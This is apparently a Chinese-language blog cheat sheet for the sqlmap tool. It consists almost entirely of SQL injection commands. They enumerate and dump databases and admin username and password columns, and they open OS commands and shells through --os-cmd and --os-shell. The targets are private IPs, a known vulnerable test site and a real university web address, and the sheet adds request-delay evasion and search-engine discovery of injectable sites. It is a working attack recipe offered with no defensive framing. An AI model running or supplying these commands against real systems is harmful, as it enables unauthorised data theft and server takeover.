asp注入点
下面爆字段,输入命令:python sqlmap.py -u https://192.168.121.1/NewsView.asp?id=8 --columns -T admin 查看admin表所在的列名
获取内容,python sqlmap.py -u https://192.168.121.1/NewsView.asp?id=8 --dump -C username,password -T admin
mysql注入语句
sqlmap.py -u https://192.168.121.1/News.php?nid=8 --dbs
获取数据库
sqlmap.py -u https://192.168.121.1/News.php?nid=8 -D 数据库 --tables
获取表
sqlmap.py -u https://192.168.121.1/News.php?nid=8 -D 数据库 -T 表段 --columns
获取字段
sqlmap.py -u https://192.168.121.1/News.php?nid=8 -D 数据库 -T 表段 -C 字段,字段 --dump
获取内容
cookie注入语句
sqlmap.py -u https://192.168.121.1/News.asp --cookie "id=58" --tables --leve 2
获取表
sqlmap.py -u https://192.168.121.1/News.asp --cookie "id=58" --columns -T 表段 --leve 2
获取字段
sqlmap.py -u https://192.168.121.1/News.asp --cookie "id=58" --dump -T admin -C "字段,字段" --leve 2
post登录框注入
自动获取表单sqlmap.py -u https://testasp.vulnweb.com/Login.asp --forms
自定义表单sqlmap -u https://testasp.vulnweb.com/Login.asp --data "tfUName=1&tfUPass=1"
burpsuit抓包复制txt放在sqlmap根目录
sqlmap.py -r test.txt -p username --dbs
交互写shell及命令执行 首先要知道站点根目录
sqlmap.py -u https://192.168.159.1/news.php?id=1 --os-cmd=ipconfig
写目标站点的根目录
sqlmap.py -u https://192.168.159.1/news.php?id=1 --os-shell
写目标站点的根目录
伪静态注入
sqlmap.py -u https://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html --dbs
获取数据库
sqlmap.py -u https://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html -D 数据库 --tables
获取表段
sqlmap.py -u https://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html -D 数据库 -T 表段 --columns
获取字段
sqlmap.py -u https://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html -D 数据库 -T 表段 -C 字段 --dump
请求延时
参数 --delay --safe-freq
例子 秒计算sqlmap.py --dbs -u https://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html --delay 5
次数计算sqlmap.py --dbs -u https://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html --safe -freq 5
google搜索注入点
sqlmap.py -g 关键词
© GrayTensor 's Blog | Powered by LOFTER